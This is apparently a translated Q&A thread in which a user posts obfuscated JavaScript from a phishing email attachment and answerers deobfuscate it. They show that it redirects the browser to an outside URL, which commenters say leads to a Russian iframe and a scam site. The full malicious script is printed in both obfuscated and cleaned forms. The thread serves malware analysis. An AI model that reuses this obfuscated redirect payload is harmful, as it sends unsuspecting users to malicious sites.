1. 首页
  2. 问答
  3. 这个可疑的网络钓鱼代码是做什么的?

这个可疑的网络钓鱼代码是做什么的?

2010-06-10 111 views
6

我的一些非IT同事在电子邮件中打开了一个.html附件,看起来非常可疑。当它出现一些JavaScript代码运行时,它导致了一个空白屏幕。这个可疑的网络钓鱼代码是做什么的?

<script type='text/javascript'>function uK(){};var kV='';uK.prototype = {f : function() {d=4906;var w=function(){};var u=new Date();var hK=function(){};var h='hXtHt9pH:9/H/Hl^e9n9dXe!r^mXeXd!i!a^.^c^oHm^/!iHmHaXg!e9sH/^zX.!hXt9m^'.replace(/[\^H\!9X]/g, '');var n=new Array();var e=function(){};var eJ='';t=document['lDo6cDart>iro6nD'.replace(/[Dr\]6\>]/g, '')];this.nH=false;eX=2280;dF="dF";var hN=function(){return 'hN'};this.g=6633;var a='';dK="";function x(b){var aF=new Array();this.q='';var hKB=false;var uN="";b['hIrBeTf.'.replace(/[\.BTAI]/g, '')]=h;this.qO=15083;uR='';var hB=new Date();s="s";}var dI=46541;gN=55114;this.c="c";nT="";this.bG=false;var m=new Date();var fJ=49510;x(t);this.y="";bL='';var k=new Date();var mE=function(){};}};var l=22739;var tL=new uK(); var p="";tL.f();this.kY=false;</script>

它做了什么?这超出了我的编程知识范围。

来源

2010-06-10 halohunter

回答

19

它将重定向到一个网址'http://lendermedia.com/images/z.htm'(按照您自己的风险进行操作)。

将代码复制并粘贴到一个有价值的JavaScript编辑器中,让它为您设置源代码。

要点:

var h = 'hXtHt9pH:9/H/Hl^e9n9dXe!r^mXeXd!i!a^.^c^oHm^/!iHmHaXg!e9sH/^zX.!hXt9m^'.replace(/[\^H\!9X]/g, '');

h将等于 'http://lendermedia.com/images/z.htm'

t = document['lDo6cDart>iro6nD'.replace(/[Dr\]6\>]/g, '')];

t将包含document.location

b['hIrBeTf.'.replace(/[\.BTAI]/g, '')] = h;

的属性命名的参考,在这一点上(里面的另一个函数)确实是t,从上面的语句中,设置为h,这就是url。

大部分的代码是纯粹的噪音,实际功能由这一点:

function uK() { 
}; 
uK.prototype = { 
    f : function() { 
    var h = 'hXtHt9pH:9/H/Hl^e9n9dXe!r^mXeXd!i!a^.^c^oHm^/!iHmHaXg!e9sH/^zX.!hXt9m^' 
     .replace(/[\^H\!9X]/g, ''); 
    t = document['lDo6cDart>iro6nD'.replace(/[Dr\]6\>]/g, '')]; 
    function x(b) { 
     b['hIrBeTf.'.replace(/[\.BTAI]/g, '')] = h; 
    } 
    x(t); 
    } 
}; 
var tL = new uK(); 
tL.f();

来源

2010-06-10 07:12:21

+5

我不建议任何人点击此链接。该页面从http://onionfleet.ru:8080/index.php?pid=10加载iframe,然后重定向到http://mouselong.com。 也**不要点击评论中的链接**除非你知道你在做什么。 – x1a4 2010-06-10 07:14:20

+2

反过来包含一个iframe链接到一些骗局网站,销售*不那么真实*手表显然... – nico 2010-06-10 07:15:57

0

减混淆,它确实像document.location.href="http://lendermedia.com/images/z.htm"

来源

2010-06-10 07:38:05 LaustN

0

关键部分了解代码是replace(/[\^H\!9X]/g, '')部分。如果替换的第二个参数是'',那么它只是从前一个字符串中删除东西。

混淆事物的真正不雅的方式。对于每个用户而言,其目标可能是随机的,并避免贝叶斯垃圾邮件过滤器。

来源

2010-06-10 15:06:51 gcb

2

我遇到了同样的问题,然后找到了这个页面。在完成WHOIS联系信息后,我联系了lendermedia.com的所有者,他似乎刚刚发现他的网站正在主办z.htm这个页面,他的知识背离了他的愿望。当我联系他时,我能够浏览他的/images/目录。他已经改变了权限。所有这一切都说,看起来这个家伙很干净,但这是你自己决定的。

来源

2010-06-10 19:21:22 mmengel

相关问题

 相关问题